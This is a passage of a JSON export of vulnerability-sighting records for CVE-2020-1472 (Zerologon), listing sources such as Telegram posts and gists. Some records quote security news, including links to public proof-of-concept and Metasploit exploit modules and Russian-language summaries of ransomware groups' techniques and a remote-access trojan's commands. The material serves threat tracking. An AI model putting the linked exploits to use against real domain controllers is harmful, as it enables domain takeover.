"2025-12-23T21:00:05.000000Z"}, {"uuid": "4b3fe1c0-f872-418e-8a18-026091cf454d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/uvU3gBnf9Z1WMovVGRRTdFZDjWMl1qRCMdPMKGqSGuqnW3I", "content": "", "creation_timestamp": "2025-12-06T15:00:08.000000Z"}, {"uuid": "66da4cc2-e771-472c-ab36-c66eee518712", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/cKure/2222", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 Windows Zerologon PoC exploits allow domain takeover. Patch Now!\n\nCVE-2020-1472\n\nhttps://www.bleepingcomputer.com/news/microsoft/windows-zerologon-poc-exploits-allow-domain-takeover-patch-now/", "creation_timestamp": "2020-09-19T11:38:39.000000Z"}, {"uuid": "db9c3694-5299-44dc-9528-d08a5336c8cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/GFK7iRP-YRfUisfPB-meWn-WL3QJHLEcpUZ2wQtZdLdd_6s", "content": "", "creation_timestamp": "2025-12-07T21:00:05.000000Z"}, {"uuid": "a208d7a4-b128-41d1-b32b-c442baf47faa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/cKure/2408", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 CVE-2020-1472\n\nhttps://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb", "creation_timestamp": "2020-09-29T09:26:18.000000Z"}, {"uuid": "1eba8c7e-2e06-4b42-ac44-e826f99e8a30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/cKure/2217", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Zerologon : Instantly become domain admin by subverting Netlogon cryptography.\n\nhttps://github.com/SecuraBV/CVE-2020-1472\n\nTest tool for CVE-2020-1472.", "creation_timestamp": "2020-09-15T14:46:33.000000Z"}, {"uuid": "e64f0462-2930-4709-8fd4-bd6914253ae2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://gist.github.com/polirise-och5ty-long/0553d1b567d5e4e4c05bd4bd470b77bf", "content": "", "creation_timestamp": "2026-04-19T17:35:28.000000Z"}, {"uuid": "a2282986-146f-4db5-aeed-ec354763197c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://gist.github.com/polirise-och5ty-long/921c7aa9360839078ec5ad52cee75648", "content": "", "creation_timestamp": "2026-04-19T17:37:51.000000Z"}, {"uuid": "f1a8b90f-ca7c-407f-bf4c-047fd700d9f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://gist.github.com/polirise-och5ty-long/26f16159ab0369f7b5368e757a208f61", "content": "", "creation_timestamp": "2026-04-19T17:39:00.000000Z"}, {"uuid": "34518a0d-6a7d-4a67-9741-d3d4e8eda2ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/CyberGovIL/877", "content": "", "creation_timestamp": "2020-10-06T11:44:09.000000Z"}, {"uuid": "d39b7353-ac9e-4389-8720-eaf3f246a5b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/8wPJR4Zrqe1NVpmz6R4R-oJOE4FmewBY2nxE00bK5aCo0SE", "content": "", "creation_timestamp": "2025-10-18T19:00:11.000000Z"}, {"uuid": "e432cd95-5306-47ee-b9e7-816a4ca9d800", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/ZHsH8l_PJf6qA-LG3pwKoQfrYnUBM4bmr6171DkIh35gCrQ", "content": "", "creation_timestamp": "2025-10-18T21:00:05.000000Z"}, {"uuid": "7c42892b-690a-4692-b8b9-98e466494240", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/itsec_news/1174", "content": "\u200b\ud83d\udde1 \u0422\u0440\u043e\u043f\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0441\u043a\u043e\u0440\u043f\u0438\u043e\u043d \u0438\u0437 \u041a\u0443\u0431\u044b \u0430\u0442\u0430\u043a\u0443\u0435\u0442 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438.\n\n\ud83d\udcac \u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u043e\u0442\u0447\u0435\u0442\u0443 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u0437 Palo Alto Networks Unit 42, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u044b\u0439 \u0438\u043c\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a Tropical Scorpius \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u043e\u043c \u0433\u0440\u0443\u043f\u043f\u044b \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 Cuba \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0440\u0430\u043d\u0435\u0435 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0442\u0435\u0445\u043d\u0438\u043a\u0438, \u0442\u0430\u043a\u0442\u0438\u043a\u0438 \u0438 \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u044b, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u043d\u043e\u0432\u044b\u0439 \u0442\u0440\u043e\u044f\u043d \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438 \u043d\u043e\u0432\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439.\n\n\u041f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0443-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c Cuba \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u0432 2019 \u0433\u043e\u0434\u0443. \u0412 \u043f\u0435\u0440\u0432\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2022 \u0433\u043e\u0434\u0430 \u0435\u0435 \u043e\u0431\u043d\u043e\u0432\u0438\u043b\u0438, \u0438 \u043e\u043d\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430, \u043f\u043e\u043c\u0438\u043c\u043e \u043f\u0440\u043e\u0447\u0435\u0433\u043e, \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043b\u044c\u0449\u0438\u043a \u0441 \u0431\u043e\u043b\u0435\u0435 \u0442\u043e\u043d\u043a\u0438\u043c\u0438 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438. \u041a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a Tropical Scorpius \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u0443\u044e \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044f Cuba, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043d\u0435 \u0438\u0437\u043c\u0435\u043d\u0438\u043b\u0430\u0441\u044c \u0441 \u043c\u043e\u043c\u0435\u043d\u0442\u0430 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0432 2019 \u0433\u043e\u0434\u0443.\n\n\u041e\u0434\u0438\u043d \u0438\u0437 \u043d\u043e\u0432\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u0441 \u0438\u044e\u043d\u044f 2022 \u0433\u043e\u0434\u0430 \u2014 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0437\u0430\u043a\u043e\u043d\u043d\u043e\u0433\u043e, \u043d\u043e \u043d\u0435\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430 NVIDIA \u0434\u043b\u044f \u043f\u043e\u0434\u043f\u0438\u0441\u0438 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430 \u044f\u0434\u0440\u0430, \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u043d\u0430 \u043d\u0430\u0447\u0430\u043b\u044c\u043d\u044b\u0445 \u044d\u0442\u0430\u043f\u0430\u0445 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f. \u0421\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u044b \u0443\u043a\u0440\u0430\u043b\u0430 \u0433\u0440\u0443\u043f\u043f\u0430 LAPSUS \u0432 \u043c\u0430\u0440\u0442\u0435 2022 \u0433\u043e\u0434\u0430. \u0417\u0430\u0434\u0430\u0447\u0430 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430 \u2014 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0442\u044c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0437\u0430\u0432\u0435\u0440\u0448\u0430\u0442\u044c \u0438\u0445, \u0447\u0442\u043e\u0431\u044b \u0445\u0430\u043a\u0435\u0440 \u043c\u043e\u0433 \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0432 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0441\u0440\u0435\u0434\u0435.\n\n\u0417\u0430\u0442\u0435\u043c Tropical Scorpius \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 Windows CVE-2022-24521.\n\n\u041d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u043c \u044d\u0442\u0430\u043f\u0435 Tropical Scorpius \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u043b ADFind \u0438 NetScan \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0431\u043e\u043a\u043e\u0432\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f. \u0422\u0430\u043a\u0436\u0435 \u0441\u0443\u0431\u044a\u0435\u043a\u0442 \u0443\u0433\u0440\u043e\u0437\u044b \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u043b \u043d\u043e\u0432\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a\u044d\u0448\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Kerberos.\n\n\u0422\u0430\u043a\u0436\u0435 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0438\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 ZeroLogon, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u043e\u0448\u0438\u0431\u043a\u0443 CVE-2020-1472 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430.\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438, \u0447\u0442\u043e Tropical Scorpius \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u0435\u0442 ROMCOM RAT, \u0440\u0430\u043d\u0435\u0435 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0441\u0432\u044f\u0437\u044c \u0441 C2-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c \u0447\u0435\u0440\u0435\u0437 ICMP-\u0437\u0430\u043f\u0440\u043e\u0441\u044b, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u044f\u043c\u0438 Windows API.\n\nROMCOM RAT \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442 10 \u043a\u043e\u043c\u0430\u043d\u0434:\n\n\u2014 \u0412\u0435\u0440\u043d\u0443\u0442\u044c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u043e\u043c \u0434\u0438\u0441\u043a\u0435;\n\u2014 \u0412\u0435\u0440\u043d\u0443\u0442\u044c \u0441\u043f\u0438\u0441\u043a\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u0434\u043b\u044f \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u043e\u0433\u043e \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430;\n\u2014 \u0417\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u043e\u0431\u0440\u0430\u0442\u043d\u0443\u044e \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0443 \u043f\u043e\u0434 \u0438\u043c\u0435\u043d\u0435\u043c \u00absvchelper.exe\u00bb \u0432 \u043f\u0430\u043f\u043a\u0435 \u00ab%ProgramData%\u00bb;\n\u2014 \u0417\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 C2-\u0441\u0435\u0440\u0432\u0435\u0440 \u0432 \u0432\u0438\u0434\u0435 ZIP-\u0444\u0430\u0439\u043b\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f IShellDispatch \u0434\u043b\u044f \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432;\n\u2014 \u0421\u043a\u0430\u0447\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0438 \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0432 \u00abworker.txt\u00bb \u0432 \u043f\u0430\u043f\u043a\u0435 \u00ab%ProgramData%\u00bb;\n\u2014 \u0423\u0434\u0430\u043b\u0438\u0442\u044c \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b;\n\u2014 \u0423\u0434\u0430\u043b\u0438\u0442\u044c \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0439 \u043a\u0430\u0442\u0430\u043b\u043e\u0433;\n\u2014 \u0421\u043e\u0437\u0434\u0430\u0442\u044c \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0441 \u043f\u043e\u0434\u043c\u0435\u043d\u043e\u0439 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0430 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430;\n\u2014 \u041e\u0431\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e ServiceMain, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u043c \u043e\u0442 C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0438 \u043f\u0440\u0438\u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 120 000 \u043c\u0441;\n\u2014 \u0418\u0442\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b \u0438 \u0441\u043e\u0431\u0440\u0430\u0442\u044c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432.\n\n\u041f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435 Tropical Scorpius \u0438 \u0435\u0433\u043e \u043d\u043e\u0432\u044b\u0445 TTP \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c Cuba \u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u0432 \u0431\u043e\u043b\u0435\u0435 \u043e\u043f\u0430\u0441\u043d\u0443\u044e \u0443\u0433\u0440\u043e\u0437\u0443. \u0422\u043e\u0447\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0436\u0435\u0440\u0442\u0432 \u043d\u0430 \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u043d\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u043d\u043e Cuba \u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b 4 \u0436\u0435\u0440\u0442\u0432 \u0441 \u0438\u044e\u043d\u044f 2022 \u0433\u043e\u0434\u0430 \u043d\u0430 \u0441\u0432\u043e\u0435\u043c onion-\u0441\u0430\u0439\u0442\u0435. \u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u0432\u0440\u0435\u043c\u044f \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0433\u043e\u0432\u043e\u0440\u043e\u0432, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0436\u0438\u0434\u0430\u044e\u0442 \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u0432\u043e \u0432\u0442\u043e\u0440\u043e\u0439 \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0435 2022 \u0433\u043e\u0434\u0430.\n\n#\u0425\u0430\u043a\u0435\u0440\u044b #\u041a\u0443\u0431\u0430 \n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-08-11T15:00:29.000000Z"}, {"uuid": "8c06e567-a7c4-4987-92ed-3759339c05ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/itsec_news/5413", "content": "\u200b\u26a1\ufe0f600 \u0436\u0435\u0440\u0442\u0432 \u0437\u0430 \u0433\u043e\u0434: RansomHub \u2013 \u043d\u043e\u0432\u044b\u0439 \u043b\u0438\u0434\u0435\u0440 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0430\u0442\u0430\u043a\n\n\ud83d\udcac \u0412 2024 \u0433\u043e\u0434\u0443 \u043d\u0430 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u043e\u0439 \u0441\u0446\u0435\u043d\u0435 \u0441\u0442\u0440\u0435\u043c\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u043d\u043e\u0432\u044b\u0439 \u0438\u0433\u0440\u043e\u043a \u2014 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 RansomHub, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u0441\u043f\u0435\u043b\u0430 \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u0442\u044c \u0443\u0436\u0435 \u0431\u043e\u043b\u0435\u0435 600 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443. \u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f Group-IB, \u0433\u0440\u0443\u043f\u043f\u0430 RansomHub \u0437\u0430\u043f\u043e\u043b\u043d\u0438\u043b\u0430 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0443\u044e \u043d\u0438\u0448\u0443 \u043f\u043e\u0441\u043b\u0435 \u043d\u0435\u0434\u0430\u0432\u043d\u0438\u0445 \u043d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u0439 \u0432 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 ALPHV \u0438 LockBit .\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e RansomHub \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u0444\u043e\u0440\u043c\u0430\u0442\u0435 ransomware-as-a-service (RaaS), \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u043f\u0440\u0438\u0432\u043b\u0435\u043a\u0430\u044f \u043f\u0430\u0440\u0442\u043d\u0451\u0440\u043e\u0432 \u043d\u0430 \u043f\u043e\u0434\u043f\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u043e\u0440\u0443\u043c\u0430\u0445, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a RAMP. \u041e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u0441\u0442\u0440\u0430\u0442\u0435\u0433\u0438\u0435\u0439 \u0441\u0442\u0430\u043b\u043e \u043f\u0435\u0440\u0435\u043c\u0430\u043d\u0438\u0432\u0430\u043d\u0438\u0435 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 , \u0440\u0430\u043d\u0435\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0432\u0448\u0438\u0445 \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0435 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u043e RansomHub \u0431\u044b\u0441\u0442\u0440\u043e \u043d\u0430\u0440\u0430\u0441\u0442\u0438\u0442\u044c \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u044b \u0430\u0442\u0430\u043a.\n\n\u0410\u043d\u0430\u043b\u0438\u0437 \u043a\u043e\u0434\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430 \u043f\u043e\u043a\u0430\u0437\u0430\u043b, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u043f\u0440\u0438\u043e\u0431\u0440\u0435\u043b\u0430 \u0441\u0432\u043e\u0451 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435 \u0443 Knight (Cyclops), \u0434\u0440\u0443\u0433\u043e\u0439 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u043e\u0439 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0433\u043e\u0442\u043e\u0432\u044b\u0445 \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0443\u0441\u043a\u043e\u0440\u0438\u043b\u043e \u0440\u0430\u0437\u0432\u0451\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0435 \u0430\u0442\u0430\u043a, \u0430 \u043c\u0443\u043b\u044c\u0442\u0438\u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043d\u0430 Windows, ESXi, Linux \u0438 FreeBSD, \u0440\u0430\u0441\u0448\u0438\u0440\u044f\u044f \u0441\u043f\u0438\u0441\u043e\u043a 